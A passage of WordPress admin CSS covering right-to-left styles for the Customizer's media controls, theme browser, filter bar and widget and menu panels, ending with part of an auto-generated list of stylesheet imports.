relative; text-align: center; cursor: default; border: 1px dashed #c3c4c7; box-sizing: border-box; padding: 9px 0; line-height: 1.6; } .customize-control .attachment-media-view .button-add-media { cursor: pointer; background-color: #f0f0f1; color: #2c3338; } .customize-control .attachment-media-view .button-add-media:hover { background-color: #fff; } .customize-control .attachment-media-view .button-add-media:focus { background-color: #fff; border-color: #3582c4; border-style: solid; box-shadow: 0 0 0 1px #3582c4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .customize-control-header .inner { display: none; position: absolute; width: 100%; color: #50575e; white-space: nowrap; text-overflow: ellipsis; overflow: hidden; } .customize-control-header .inner, .customize-control-header .inner .dashicons { line-height: 20px; top: 8px; } .customize-control-header .list .inner, .customize-control-header .list .inner .dashicons { top: 9px; } .customize-control-header .header-view { position: relative; width: 100%; margin-bottom: 12px; } .customize-control-header .header-view:last-child { margin-bottom: 0; } /* Convoluted, but 'outline' support isn't good enough yet */ .customize-control-header .header-view:after { border: 0; } .customize-control-header .header-view.selected .choice:focus { outline: none; } .customize-control-header .header-view.selected:after { content: ""; position: absolute; height: auto; top: 0; right: 0; bottom: 0; left: 0; border: 4px solid #72aee6; border-radius: 2px; } .customize-control-header .header-view.button.selected { border: 0; } /* Header control: overlay "close" button */ .customize-control-header .uploaded .header-view .close { font-size: 20px; color: #fff; background: #50575e; background: rgba(0, 0, 0, 0.5); position: absolute; top: 10px; right: -999px; z-index: 1; width: 26px; height: 26px; cursor: pointer; } .customize-control-header .header-view:hover .close, .customize-control-header .header-view .close:focus { right: auto; left: 10px; } .customize-control-header .header-view .close:focus { outline: 1px solid #4f94d4; } /* Header control: randomiz(s)er */ .customize-control-header .random.placeholder { cursor: pointer; border-radius: 2px; height: 40px; } .customize-control-header button.random { width: 100%; height: auto; min-height: 40px; white-space: normal; } .customize-control-header button.random .dice { margin-top: 0; } .customize-control-header .placeholder:hover .dice, .customize-control-header .header-view:hover > button.random .dice { animation: dice-color-change 3s infinite; } .button-see-me { animation: bounce .7s 1; transform-origin: center bottom; } @keyframes bounce { from, 20%, 53%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); transform: translate3d(0,0,0); } 40%, 43% { animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); transform: translate3d(0, -12px, 0); } 70% { animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); transform: translate3d(0, -6px, 0); } 90% { transform: translate3d(0,-1px,0); } } .customize-control-header .choice { position: relative; display: block; margin-bottom: 9px; } .customize-control-header .choice:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .customize-control-header .uploaded div:last-child > .choice { margin-bottom: 0; } .customize-control .attachment-media-view .thumbnail-image img, .customize-control-header img { max-width: 100%; } .customize-control .attachment-media-view .remove-button, .customize-control .attachment-media-view .default-button, .customize-control-header .remove { margin-left: 8px; } /* Background position control */ .customize-control-background_position .background-position-control .button-group { display: block; } /** * Code Editor Control and Custom CSS Section * * Modifications to the Section Container to make the textarea full-width and * full-height, if the control is the only control in the section. */ .customize-control-code_editor textarea { width: 100%; font-family: Consolas, Monaco, monospace; font-size: 12px; padding: 6px 8px; tab-size: 2; } .customize-control-code_editor textarea, .customize-control-code_editor .CodeMirror { height: 14em; } #customize-controls .customize-section-description-container.section-meta.customize-info { border-bottom: none; } #sub-accordion-section-custom_css .customize-control-notifications-container { margin-bottom: 15px; } #customize-control-custom_css textarea { display: block; height: 500px; } .customize-section-description-container + #customize-control-custom_css .customize-control-title { margin-right: 12px; } .customize-section-description-container + #customize-control-custom_css:last-child textarea { border-left: 0; border-right: 0; height: calc( 100vh - 185px ); resize: none; } .customize-section-description-container + #customize-control-custom_css:last-child { margin-right: -12px; width: 299px; width: calc( 100% + 24px ); margin-bottom: -12px; } .customize-section-description-container + #customize-control-custom_css:last-child .CodeMirror { height: calc( 100vh - 185px ); } .CodeMirror-lint-tooltip, .CodeMirror-hints { z-index: 500000 !important; } .customize-section-description-container + #customize-control-custom_css:last-child .customize-control-notifications-container { margin-right: 12px; margin-left: 12px; } .theme-browser .theme.active .theme-actions, .wp-customizer .theme-browser .theme .theme-actions { padding: 9px 15px; } .theme-browser .theme:not(.active) .theme-actions { box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.1); } @media screen and (max-width: 640px) { .customize-section-description-container + #customize-control-custom_css:last-child { margin-left: 0; } .customize-section-description-container + #customize-control-custom_css:last-child textarea { height: calc( 100vh - 140px ); } } /** * Themes */ #customize-theme-controls .control-panel-themes { border-bottom: none; } #customize-theme-controls .control-panel-themes > .accordion-section-title:hover, /* Not a focusable element. */ #customize-theme-controls .control-panel-themes > .accordion-section-title { cursor: default; background: #fff; color: #50575e; border-top: 1px solid #dcdcde; border-bottom: 1px solid #dcdcde; border-right: none; border-left: none; margin: 0 0 15px; padding: 12px 15px 15px 100px; /* Space for the button */ } #customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child:hover, /* Not a focusable element. */ #customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child { border-top: 0; } #customize-theme-controls .control-section-themes > .accordion-section-title:hover, /* Not a focusable element. */ #customize-theme-controls .control-section-themes > .accordion-section-title { margin: 0 0 15px; } #customize-controls .customize-themes-panel .accordion-section-title:hover, #customize-controls .customize-themes-panel .accordion-section-title { margin: 15px -8px; } #customize-controls .control-section-themes .accordion-section-title, #customize-controls .customize-themes-panel .accordion-section-title { padding-left: 100px; /* Space for the button */ } .control-panel-themes .accordion-section-title span.customize-action, #customize-controls .customize-section-title span.customize-action, #customize-controls .control-section-themes .accordion-section-title span.customize-action, #customize-controls .customize-section-title span.customize-action { font-size: 13px; display: block; font-weight: 400; } #customize-theme-controls .control-panel-themes .accordion-section-title .change-theme { position: absolute; left: 10px; top: 50%; margin-top: -20px; /* Half of 40px button height for vertical centering */ font-weight: 400; } #customize-notifications-area .notification-message button.switch-to-editor { display: block; margin-top: 6px; font-weight: 400; } #customize-theme-controls .control-panel-themes > .accordion-section-title:after { display: none; } .control-panel-themes .customize-themes-full-container { position: fixed; top: 0; right: 0; transition: .18s right ease-in-out; margin: 0 300px 0 0; padding: 71px 0 25px; overflow-y: scroll; width: calc(100% - 300px); height: calc(100% - 96px); background: #f0f0f1; z-index: 20; } @media (prefers-reduced-motion: reduce) { .control-panel-themes .customize-themes-full-container { transition: none; } } @media screen and (min-width: 1670px) { .control-panel-themes .customize-themes-full-container { width: 82%; left: 0; right: initial; } } .modal-open .control-panel-themes .customize-themes-full-container { overflow-y: visible; } /* Animations for opening the themes panel */ #customize-save-button-wrapper, #customize-header-actions .spinner, #customize-header-actions .customize-controls-preview-toggle { transition: .18s margin ease-in-out; } #customize-footer-actions, #customize-footer-actions .collapse-sidebar { bottom: 0; transition: .18s bottom ease-in-out; } .in-themes-panel:not(.animating) #customize-header-actions .spinner, .in-themes-panel:not(.animating) #customize-header-actions .customize-controls-preview-toggle, .in-themes-panel:not(.animating) #customize-preview, .in-themes-panel:not(.animating) #customize-footer-actions { visibility: hidden; } .wp-full-overlay.in-themes-panel { background: #f0f0f1; /* Prevents a black flash when fading in the panel */ } .in-themes-panel #customize-save-button-wrapper, .in-themes-panel #customize-header-actions .spinner, .in-themes-panel #customize-header-actions .customize-controls-preview-toggle { margin-top: -46px; /* Height of header actions bar */ } .in-themes-panel #customize-footer-actions, .in-themes-panel #customize-footer-actions .collapse-sidebar { bottom: -45px; } /* Don't show the theme count while the panel opens, as it's in the wrong place during the animation */ .in-themes-panel.animating .control-panel-themes .filter-themes-count { display: none; } .in-themes-panel.wp-full-overlay .wp-full-overlay-sidebar-content { bottom: 0; } .themes-filter-bar .feature-filter-toggle { min-height: 32px; line-height: 2.30769231; } .themes-filter-bar .feature-filter-toggle:before { content: "\f111"; content: "\f111" / ''; margin: 0 0 0 5px; font: normal 16px/1 dashicons; vertical-align: text-bottom; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .themes-filter-bar .feature-filter-toggle.open { background: #f0f0f1; border-color: #8c8f94; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); } .themes-filter-bar .feature-filter-toggle .filter-count-filters { display: none; } .filter-drawer { box-sizing: border-box; width: 100%; position: absolute; top: 46px; right: 0; padding: 25px 25px 25px 0; border-top: 0; margin: 0; background: #f0f0f1; border-bottom: 1px solid #dcdcde; } .filter-drawer .filter-group { margin: 0 0 0 25px; width: calc( (100% - 75px) / 3); min-width: 200px; max-width: 320px; } /* Adds a delay before fading in to avoid it "jumping" */ @keyframes themes-fade-in { 0% { opacity: 0; } 50% { opacity: 0; } 100% { opacity: 1; } } .control-panel-themes .customize-themes-full-container.animate { animation: .6s themes-fade-in 1; } .in-themes-panel:not(.animating) .control-panel-themes .filter-themes-count { animation: .6s themes-fade-in 1; } .control-panel-themes .filter-themes-count .themes-displayed { font-weight: 600; color: #50575e; } .customize-themes-notifications { margin: 0; } .control-panel-themes .customize-themes-notifications .notice { margin: 0 0 25px; } .customize-themes-full-container .customize-themes-section { display: none !important; /* There is unknown JS that perpetually tries to show all theme sections when more items are added. */ overflow: hidden; } .customize-themes-full-container .customize-themes-section.current-section { display: list-item !important; /* There is unknown JS that perpetually tries to show all theme sections when more items are added. */ } .control-section .customize-section-text-before { padding: 0 15px 8px 0; margin: 15px 0 0; line-height: 16px; border-bottom: 1px solid #dcdcde; color: #50575e; } .control-panel-themes .customize-themes-section-title { width: 100%; background: #fff; box-shadow: none; outline: none; border-top: none; border-bottom: 1px solid #dcdcde; border-right: 4px solid #fff; border-left: none; cursor: pointer; padding: 10px 15px; position: relative; text-align: right; font-size: 14px; font-weight: 600; color: #50575e; text-shadow: none; } .control-panel-themes #accordion-section-installed_themes { border-top: 1px solid #dcdcde; } .control-panel-themes .theme-section { margin: 0; position: relative; } .control-panel-themes .customize-themes-section-title:focus, .control-panel-themes .customize-themes-section-title:hover { background: #f6f7f7; } .customize-themes-section-title:not(.selected):after { content: ""; display: block; position: absolute; top: 9px; left: 15px; width: 18px; height: 18px; border-radius: 100%; border: 1px solid #c3c4c7; background: #fff; } .control-panel-themes .theme-section .customize-themes-section-title.selected:after { content: "\f147"; content: "\f147" / ''; font: 16px/1 dashicons; box-sizing: border-box; width: 20px; height: 20px; padding: 3px 1px 1px 3px; /* Re-align the icon to the smaller grid */ border-radius: 100%; position: absolute; top: 9px; left: 15px; color: #fff; } #customize-theme-controls .themes.accordion-section-content { position: relative; right: 0; padding: 0; width: 100%; } .loading .customize-themes-section .spinner { display: block; visibility: visible; position: relative; clear: both; width: 20px; height: 20px; right: calc(50% - 10px); float: none; margin-top: 50px; } .customize-themes-section .no-themes, .customize-themes-section .no-themes-local { display: none; } .themes-section-installed_themes .theme .notice-success:not(.updated-message) { display: none; /* Hide "installed" notice on installed themes tab. */ } .customize-control-theme .theme { width: 100%; margin: 0; border: 1px solid #dcdcde; background: #fff; } .customize-control-theme .theme .theme-name, .customize-control-theme .theme .theme-actions { background: #fff; border: none; } .customize-control.customize-control-theme { /* override most properties on .customize-control */ box-sizing: border-box; width: 25%; max-width: 600px; /* Max. screenshot size / 2 */ margin: 0 0 25px 25px; padding: 0; clear: none; } /* 5 columns above 2100px */ @media screen and (min-width: 2101px) { .customize-control.customize-control-theme { width: calc( ( 100% - 125px ) / 5 - 1px ); /* 1px offset accounts for browser rounding, typical all grids */ } } /* 4 columns up to 2100px */ @media screen and (min-width: 1601px) and (max-width: 2100px) { .customize-control.customize-control-theme { width: calc( ( 100% - 100px ) / 4 - 1px ); } } /* 3 columns up to 1600px */ @media screen and (min-width: 1201px) and (max-width: 1600px) { .customize-control.customize-control-theme { width: calc( ( 100% - 75px ) / 3 - 1px ); } } /* 2 columns up to 1200px */ @media screen and (min-width: 851px) and (max-width: 1200px) { .customize-control.customize-control-theme { width: calc( ( 100% - 50px ) / 2 - 1px ); } } /* 1 column up to 850 px */ @media screen and (max-width: 850px) { .customize-control.customize-control-theme { width: 100%; } } .wp-customizer .theme-browser .themes { padding: 0 25px 25px 0; transition: .18s margin-top linear; } .wp-customizer .theme-browser .theme .theme-actions { opacity: 1; } #customize-controls h3.theme-name { font-size: 15px; } #customize-controls .theme-overlay .theme-name { font-size: 32px; } .customize-preview-header.themes-filter-bar { position: fixed; top: 0; right: 300px; width: calc(100% - 300px); height: 46px; background: #f0f0f1; z-index: 10; padding: 6px 25px; box-sizing: border-box; border-bottom: 1px solid #dcdcde; } .customize-preview-header.themes-filter-bar, .customize-preview-header.themes-filter-bar .search-form { display: flex; align-items: center; gap: 10px; flex-wrap: wrap; } .customize-preview-header.themes-filter-bar .search-form-input { position: relative; } .customize-preview-header .filter-themes-wrapper { display: grid; align-items: center; gap: 10px; grid-template-columns: auto 1fr; } .customize-preview-header .filter-themes-wrapper .filter-themes-count { justify-self: end; } @media screen and (min-width: 1670px) { .customize-preview-header.themes-filter-bar { width: 82%; left: 0; right: initial; } } .themes-filter-bar .themes-filter-container { margin: 0; padding: 0; display: flex; align-items: center; gap: 10px; } .themes-filter-bar .wp-filter-search { padding: 0 30px 0 10px; max-width: 100%; width: 40%; min-width: 300px; height: 32px; min-height: 32px; /* Override global 40px min-height for compact bar */ margin: 1px 0; top: 0; right: 0; } /* Unstick the filter bar on short windows/screens. This breakpoint is based on the current length of .org feature filters assuming translations do not wrap lines. */ @media screen and (max-height: 540px), screen and (max-width: 1018px) { .customize-preview-header.themes-filter-bar { position: relative; right: 0; width: 100%; margin: 0 0 25px; } .filter-drawer { top: 46px; } .wp-customizer .theme-browser .themes { padding: 0 25px 25px 0; overflow: hidden; } .control-panel-themes .customize-themes-full-container { margin-top: 0; padding: 0; height: 100%; width: calc(100% - 300px); } } @media screen and (max-width: 1018px) { .filter-drawer .filter-group { width: calc( (100% - 50px) / 2); } } @media screen and (max-width: 960px) { .customize-preview-header.themes-filter-bar { height: 96px; } } @media screen and (max-width: 900px) { .themes-filter-bar .wp-filter-search { width: 100%; margin: 0; min-width: 200px; } .customize-preview-header.themes-filter-bar, .customize-preview-header.themes-filter-bar .search-form .themes-filter-bar .themes-filter-container { display: grid; gap: 4px; } .customize-preview-header.themes-filter-bar .search-form-input { display: flex; flex-grow: 1; } .filter-drawer { top: 86px; } .control-panel-themes .filter-themes-count { float: right; } } @media screen and (max-width: 792px) { .filter-drawer .filter-group { width: calc( 100% - 25px); } } .control-panel-themes .customize-themes-mobile-back { display: none; } /* Mobile - toggle between themes and filters */ @media screen and (max-width: 600px) { .filter-drawer { top: 132px; } .wp-full-overlay.showing-themes .control-panel-themes .filter-themes-count .filter-themes { display: block; float: left; } .control-panel-themes .customize-themes-full-container { width: 100%; margin: 0; padding-top: 46px; height: calc(100% - 46px); z-index: 1; display: none; } .showing-themes .control-panel-themes .customize-themes-full-container { display: block; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back { display: block; position: fixed; top: 0; right: 0; background: #f0f0f1; color: #3c434a; border-radius: 0; box-shadow: none; border: none; height: 46px; width: 100%; z-index: 10; text-align: right; text-shadow: none; border-bottom: 1px solid #dcdcde; border-right: 4px solid transparent; margin: 0; padding: 0; font-size: 0; overflow: hidden; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:before { right: 0; top: 0; height: 46px; width: 26px; display: block; line-height: 2.3; padding: 0 8px; border-left: 1px solid #dcdcde; } .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:hover, .wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:focus { background: #f6f7f7; box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .showing-themes #customize-header-actions { display: none; } #customize-controls { width: 100%; } } /* Details View */ .wp-customizer .theme-overlay { display: none; } .wp-customizer.modal-open .theme-overlay { position: fixed; right: 0; top: 0; left: 0; bottom: 0; z-index: 109; } /* Avoid a z-index war by resetting elements that should be under the overlay. This is likely required because of the way that sections and panels are positioned. */ .wp-customizer.modal-open #customize-header-actions, .wp-customizer.modal-open .control-panel-themes .filter-themes-count, .wp-customizer.modal-open .control-panel-themes .customize-themes-section-title.selected:after { z-index: -1; } .wp-full-overlay.in-themes-panel.themes-panel-expanded #customize-controls .wp-full-overlay-sidebar-content { overflow: visible; } .wp-customizer .theme-overlay .theme-backdrop { background: rgba(240, 240, 241, 0.75); position: fixed; z-index: 110; } .wp-customizer .theme-overlay .star-rating { float: right; margin-left: 8px; } .wp-customizer .theme-rating .num-ratings { line-height: 20px; } .wp-customizer .theme-overlay .theme-wrap { right: 90px; left: 90px; top: 45px; bottom: 45px; z-index: 120; } .wp-customizer .theme-overlay .theme-actions { text-align: left; /* Because there're only one or two actions, match the UI pattern of media modals and right-align the action. */ padding: 10px 25px 5px; background: #f0f0f1; border-top: 1px solid #dcdcde; } .wp-customizer .theme-overlay .theme-actions .theme-install.preview { margin-right: 8px; } .modal-open .in-themes-panel #customize-controls .wp-full-overlay-sidebar-content { overflow: visible; /* Prevent the top-level Customizer controls from becoming visible when elements on the right of the details modal are focused. */ } .wp-customizer .theme-header { background: #f0f0f1; } .wp-customizer .theme-overlay .theme-header button, .wp-customizer .theme-overlay .theme-header .close:before { color: #3c434a; } .wp-customizer .theme-overlay .theme-header .close:focus, .wp-customizer .theme-overlay .theme-header .close:hover, .wp-customizer .theme-overlay .theme-header .right:focus, .wp-customizer .theme-overlay .theme-header .right:hover, .wp-customizer .theme-overlay .theme-header .left:focus, .wp-customizer .theme-overlay .theme-header .left:hover { background: #fff; } .wp-customizer .theme-overlay .theme-header .close:focus:before, .wp-customizer .theme-overlay .theme-header .close:hover:before { color: var(--wp-admin-theme-color); } .wp-customizer .theme-overlay .theme-header button.disabled, .wp-customizer .theme-overlay .theme-header button.disabled:hover, .wp-customizer .theme-overlay .theme-header button.disabled:focus { border-bottom: none; background: transparent; color: #c3c4c7; } /* Small Screens */ @media (max-width: 850px), (max-height: 472px) { .wp-customizer .theme-overlay .theme-wrap { right: 0; left: 0; top: 0; bottom: 0; } .wp-customizer .theme-browser .themes { padding-left: 25px; } } /* Handle cheaters. */ body.cheatin { font-size: medium; height: auto; background: #fff; border: 1px solid #c3c4c7; margin: 50px auto 2em; padding: 1em 2em; max-width: 700px; min-width: 0; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } body.cheatin h1 { border-bottom: 1px solid #dcdcde; clear: both; color: #50575e; font-size: 24px; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; margin: 30px 0 0; padding: 0 0 7px; } body.cheatin p { font-size: 14px; line-height: 1.5; margin: 25px 0 20px; } /** * Widgets and Menus common styles */ /* higher specificity than .wp-core-ui .button */ #customize-theme-controls .add-new-widget, #customize-theme-controls .add-new-menu-item { cursor: pointer; float: left; margin: 0 10px 0 0; transition: all 0.2s; -webkit-user-select: none; user-select: none; outline: none; } .reordering .add-new-widget, .reordering .add-new-menu-item { opacity: 0.2; pointer-events: none; cursor: not-allowed; /* doesn't work in conjunction with pointer-events */ } .add-new-widget:before, .add-new-menu-item:before, #available-menu-items .new-content-item .add-content:before { content: "\f132"; content: "\f132" / ''; display: inline-block; position: relative; right: -2px; top: 0; font: normal 20px/1 dashicons; vertical-align: middle; transition: all 0.2s; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* Reordering */ .reorder-toggle { float: left; padding: 5px 8px; text-decoration: none; cursor: pointer; outline: none; } .reorder, .reordering .reorder-done { display: block; padding: 5px 8px; } .reorder-done, .reordering .reorder { display: none; } .widget-reorder-nav span, .menu-item-reorder-nav button { position: relative; overflow: hidden; float: right; display: block; width: 33px; /* was 42px for mobile */ height: 43px; color: #8c8f94; text-indent: -9999px; cursor: pointer; outline: none; } .menu-item-reorder-nav button { width: 30px; height: 40px; background: transparent; border: none; box-shadow: none; } .widget-reorder-nav span:before, .menu-item-reorder-nav button:before { display: inline-block; position: absolute; top: 0; left: 0; width: 100%; height: 100%; font: normal 20px/43px dashicons; text-align: center; text-indent: 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .widget-reorder-nav span:hover, .widget-reorder-nav span:focus, .menu-item-reorder-nav button:hover, .menu-item-reorder-nav button:focus { color: #1d2327; background: #f0f0f1; } .move-widget-down:before, .menus-move-down:before { content: "\f347"; content: "\f347" / ''; } .move-widget-up:before, .menus-move-up:before { content: "\f343"; content: "\f343" / ''; } #customize-theme-controls .first-widget .move-widget-up, #customize-theme-controls .last-widget .move-widget-down, .move-up-disabled .menus-move-up, .move-down-disabled .menus-move-down, .move-right-disabled .menus-move-right, .move-left-disabled .menus-move-left { color: #dcdcde; background-color: #fff; cursor: default; pointer-events: none; } /** * New widget and Add-menu-items modes and panels */ .wp-full-overlay-main { left: auto; /* this overrides a right: 0; which causes the preview to resize, I'd rather have it go off screen at the normal size. */ width: 100%; } body.adding-widget .add-new-widget, body.adding-widget .add-new-widget:hover, .adding-menu-items .add-new-menu-item, .adding-menu-items .add-new-menu-item:hover, .add-menu-toggle.open, .add-menu-toggle.open:hover { background: #f0f0f1; border-color: #8c8f94; color: #2c3338; box-shadow: inset 0 2px 5px -3px rgba(0, 0, 0, 0.5); } body.adding-widget .add-new-widget:before, .adding-menu-items .add-new-menu-item:before, #accordion-section-add_menu .add-new-menu-item.open:before { transform: rotate(-45deg); } #available-widgets, #available-menu-items { position: absolute; top: 0; bottom: 0; right: -301px; visibility: hidden; overflow-x: hidden; overflow-y: auto; width: 300px; margin: 0; z-index: 4; background: #f0f0f1; transition: right .18s; border-left: 1px solid #dcdcde; } #available-widgets .accordion-section-title, #available-menu-items .accordion-section-title { z-index: 2; } #available-widgets .customize-section-title, #available-menu-items .customize-section-title { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } #available-widgets .customize-section-title button, #available-menu-items .customize-section-title button { display: none; } #available-widgets-list { top: 82px; position: absolute; overflow: auto; bottom: 0; width: 100%; border-top: 1px solid #dcdcde; } .no-widgets-found #available-widgets-list { border-top: none; } #available-widgets-filter { position: fixed; top: 0; z-index: 1; width: 300px; background: #f0f0f1; } /* search field container */ #available-widgets-filter, #available-menu-items-search .accordion-section-title { padding: 13px 15px; box-sizing: border-box; } #available-widgets-filter input, #available-menu-items-search input { width: 100%; min-height: 40px; margin: 1px 0; padding: 0 30px; } #available-widgets-filter input::-ms-clear, #available-menu-items-search input::-ms-clear { display: none; /* remove the "x" in IE, which conflicts with the "x" icon on button.clear-results */ } #available-menu-items-search .search-icon, #available-widgets-filter .search-icon { display: block; position: absolute; bottom: 19px; /* 13 container padding +1 input margin +1 input border +4 centering in 40px input */ right: 16px; width: 30px; height: 30px; line-height: 2.1; text-align: center; color: #646970; } #available-widgets-filter .clear-results, #available-menu-items-search .accordion-section-title .clear-results { position: absolute; top: 40px; /* 13 container padding +1 input margin +1 input border +4 centering in 40px input */ left: 16px; width: 30px; height: 30px; padding: 0; border: 0; cursor: pointer; background: none; color: #d63638; text-decoration: none; outline: 0; } #available-widgets-filter .clear-results, #available-menu-items-search .clear-results, #available-menu-items-search.loading .clear-results.is-visible { display: none; } #available-widgets-filter .clear-results.is-visible, #available-menu-items-search .clear-results.is-visible { display: block; } #available-widgets-filter .clear-results:before, #available-menu-items-search .clear-results:before { content: "\f335"; content: "\f335" / ''; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #available-widgets-filter .clear-results:hover, #available-widgets-filter .clear-results:focus, #available-menu-items-search .clear-results:hover, #available-menu-items-search .clear-results:focus { color: #d63638; } #available-widgets-filter .clear-results:focus, #available-menu-items-search .clear-results:focus { border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #available-menu-items-search .search-icon:after, #available-widgets-filter .search-icon:after, .themes-filter-bar .search-icon:after { content: "\f179"; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .themes-filter-bar .search-icon { position: absolute; top: 2px; right: 2px; z-index: 1; color: #646970; height: 30px; width: 30px; line-height: 2; text-align: center; } .no-widgets-found-message { display: none; margin: 0; padding: 0 15px; line-height: inherit; } .no-widgets-found .no-widgets-found-message { display: block; } #available-widgets .widget-top, #available-widgets .widget-top:hover, #available-menu-items .item-top, #available-menu-items .item-top:hover { border: none; background: transparent; box-shadow: none; } #available-widgets .widget-tpl, #available-menu-items .item-tpl { position: relative; padding: 15px 60px 15px 15px; background: #fff; border-bottom: 1px solid #dcdcde; border-right: 4px solid #fff; transition: .15s color ease-in-out, .15s background-color ease-in-out, .15s border-color ease-in-out; cursor: pointer; display: none; } #available-widgets .widget, #available-menu-items .item { position: static; } /* Responsive */ .customize-controls-preview-toggle { display: none; } @media only screen and (max-width: 782px) { .wp-customizer .theme:not(.active):hover .theme-actions, .wp-customizer .theme:not(.active):focus .theme-actions { display: block; } .wp-customizer .theme-browser .theme.active .theme-name span { display: inline; } .customize-control-header button.random .dice { margin-top: 0; } .customize-control-radio .customize-inside-control-row, .customize-control-checkbox .customize-inside-control-row, .customize-control-nav_menu_auto_add .customize-inside-control-row { margin-right: 32px; } .customize-control-radio input, .customize-control-checkbox input, .customize-control-nav_menu_auto_add input { margin-right: -32px; } .customize-control input[type="radio"] + label + br, .customize-control input[type="checkbox"] + label + br { line-height: 2.5; /* For widgets checkboxes */ } .customize-control .date-time-fields select { height: 39px; } .date-time-fields .date-input.month { width: 79px; } .date-time-fields .date-input.day, .date-time-fields .date-input.hour, .date-time-fields .date-input.minute { width: 55px; } .date-time-fields .date-input.year { width: 80px; } #customize-control-changeset_preview_link a { bottom: 16px; } .media-widget-control .media-widget-buttons .button.edit-media, .media-widget-control .media-widget-buttons .button.change-media, .media-widget-control .media-widget-buttons .button.select-media { margin-top: 12px; } .customize-preview-header.themes-filter-bar .search-icon { top: 6px; } } @media screen and (max-width: 1200px) { .outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main { right: 67%; } } @media screen and (max-width: 640px) { /* when the sidebar is collapsed and switching to responsive view, bring it back see ticket #35220 */ .wp-full-overlay.collapsed #customize-controls { margin-right: 0; } .wp-full-overlay-sidebar .wp-full-overlay-sidebar-content { bottom: 0; } .customize-controls-preview-toggle { display: block; position: absolute; top: 0; right: 48px; line-height: 2.6; font-size: 14px; padding: 0 12px 4px; margin: 0; height: 45px; background: #f0f0f1; border: 0; border-left: 1px solid #dcdcde; border-top: 4px solid #f0f0f1; color: #50575e; cursor: pointer; transition: color .1s ease-in-out, background .1s ease-in-out; } #customize-footer-actions, /*#customize-preview,*/ .customize-controls-preview-toggle .controls, .preview-only .wp-full-overlay-sidebar-content, .preview-only .customize-controls-preview-toggle .preview { display: none; } .preview-only #customize-save-button-wrapper { margin-top: -46px; } .customize-controls-preview-toggle .preview:before, .customize-controls-preview-toggle .controls:before { font: normal 20px/1 dashicons; content: "\f177"; content: "\f177" / ''; position: relative; top: 4px; margin-left: 6px; } .customize-controls-preview-toggle .controls:before { content: "\f540"; content: "\f540" / ''; } .preview-only #customize-controls { height: 45px; } .preview-only #customize-preview, .preview-only .customize-controls-preview-toggle .controls { display: block; } .wp-core-ui.wp-customizer .button { padding: 0 14px; line-height: 2.14285714; /* 30px */ font-size: 14px; vertical-align: middle; } .customize-control .attachment-media-view .upload-button { text-align: center; } #customize-control-changeset_status .customize-inside-control-row { padding-top: 15px; } body.adding-widget div#available-widgets, body.adding-menu-items div#available-menu-items, body.outer-section-open div#customize-sidebar-outer-content { width: 100%; } #available-widgets .customize-section-title, #available-menu-items .customize-section-title { border: 0; clip-path: none; height: inherit; margin: 0; overflow: hidden; padding: 0; width: auto; position: static; } #available-widgets .customize-section-title button, #available-menu-items .customize-section-title button { display: block; } #available-widgets .customize-section-back, #available-menu-items .customize-section-back { height: 69px; } #available-widgets .customize-section-title h3, #available-menu-items .customize-section-title h3 { font-size: 20px; font-weight: 200; padding: 9px 14px 12px 10px; margin: 0; line-height: 24px; color: #50575e; display: block; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #available-widgets .customize-section-title .customize-action, #available-menu-items .customize-section-title .customize-action { font-size: 13px; display: block; font-weight: 400; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #available-widgets-filter { position: relative; width: 100%; height: auto; } #available-widgets-list { top: 152px; } #available-menu-items-search .clear-results { top: 40px; left: 16px; } .reorder, .reordering .reorder-done { padding: 8px; } } @media screen and (max-width: 600px) { .wp-full-overlay.expanded { margin-right: 0; } body.adding-widget div#available-widgets, body.adding-menu-items div#available-menu-items, body.outer-section-open div#customize-sidebar-outer-content { top: 46px; z-index: 10; } body.wp-customizer .wp-full-overlay.expanded #customize-sidebar-outer-content { right: -100%; } body.wp-customizer.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { right: 0; } } /*! This file is auto-generated */ @import url(common-rtl.css); @import url(forms-rtl.css); @import url(admin-menu-rtl.css); @import url(dashboard-rtl.css); @import url(list-tables-rtl.css); @import url(edit-rtl.css); @import url(revisions-rtl.css); @import url(media-rtl.css); @import url(themes-rtl.css); @import url(about-rtl.css); @import url(nav-menus-rtl.css); @import url(widgets-rtl.css); @import 